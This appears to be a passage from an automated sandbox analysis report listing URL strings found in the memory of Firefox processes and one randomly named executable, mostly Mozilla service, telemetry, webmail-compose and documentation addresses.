Source: firefox.exe, 0000001B.00000003.3245523284.000001C23E294000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3646061223.000001C23E603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3232307080.000001C23E294000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3626934066.000001C23CE19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/relay
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346346381.000001C237BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.27.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3652245578.000001C23F184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitConfiguration
Source: firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C24448A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D11F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3648786422.000001C23EA51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3648786422.000001C23EA51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com2e1fac17-9068-4561-b72a-c1e101be76f9extensions.langpacks.signatures
Source: firefox.exe, 0000001B.00000002.3609614943.000001C23C173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3609227343.000001C23C021000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351019948.000001C2384BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001B.00000003.3247118953.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3609614943.000001C23C173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610402766.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3155911537.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001B.00000003.3247118953.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3609614943.000001C23C173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610402766.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3155911537.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3286911695.000001C22C3D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6E73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestbug-1648229-rollout-comcast-steering-rollout-relea
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3206512868.000001C23E161000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3436711953.000001C239B6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351019948.000001C2384B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001B.00000002.3624313828.000001C23CBC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 0000001B.00000002.3609614943.000001C23C173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3206512868.000001C23E161000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3206512868.000001C23E161000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: firefox.exe, 0000001B.00000003.3247118953.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3609614943.000001C23C173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610402766.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3155911537.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001B.00000002.3640448626.000001C23DD70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com
Source: firefox.exe, 0000001B.00000002.3640448626.000001C23DD70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E0A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com/
Source: firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437483944.000001C23A0C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3263358958.000001E2D6CB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3267971841.00000235A5890000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3654754835.000001C23FD05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B4E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3436711953.000001C239B6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351019948.000001C2384B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150637847.000001C23BE3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610655302.000001C23C303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150450150.000001C23BE1D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150800700.000001C23BE60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610655302.000001C23C377000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150183043.000001C23C300000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/aboutConfigPrefs.onPrefChange
Source: firefox.exe, 0000001B.00000002.3641525579.000001C23DED9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: firefox.exe, 0000001B.00000002.3654754835.000001C23FDA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3652245578.000001C23F1C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F1C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CF21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CF21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C24448A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F123000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5312000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/Routed
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/http://mozilla.org/#/properties/branches/anyOf/1/items/properties/featur
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C24448A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3622884951.000001C23C918000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238527000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3654754835.000001C23FD87000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userDISCOVERY_STREAM_DEV_SYNC_RS
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userDISCOVERY_STREAM_DEV_SYNC_RSDISCOVERY_STREAM_FEEDS_UPDATEDISCOVERY_S
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D00B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D15A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E0D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jscolor-mix(in
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D006000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D00B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D15A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CFE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E0D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CFA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelSHUTDOWN_PHASE_DURATION_TICKS_PROFILE_CHANGE_NET
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B4E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3436711953.000001C239B6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001B.00000002.3624313828.000001C23CBC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437483944.000001C23A0C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3263358958.000001E2D6CB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3267971841.00000235A5890000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001B.00000002.3651042917.000001C23ED85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3646061223.000001C23E6C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191276571.000001C23ED85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001B.00000002.3645713303.000001C23E5E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/firefox-relay-integration
Source: firefox.exe, 0000001B.00000002.3649402880.000001C23EB29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B96F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437483944.000001C23A0C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3646061223.000001C23E6A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E088000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3263358958.000001E2D6CB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3267971841.00000235A5890000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpchrome://browser/con
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3654583430.000001C23FCA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingschrome://browser/content/mi
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesstartMigration
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation.unified-extensions-context-menu-move-widget-downr
Source: 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.orgchrome://browser/skin/menu.svgdevice-connected-notification_migrateXULSto
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B4E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3436711953.000001C239B6F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001B.00000002.3624313828.000001C23CBC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com/
Source: firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CF19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E02D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
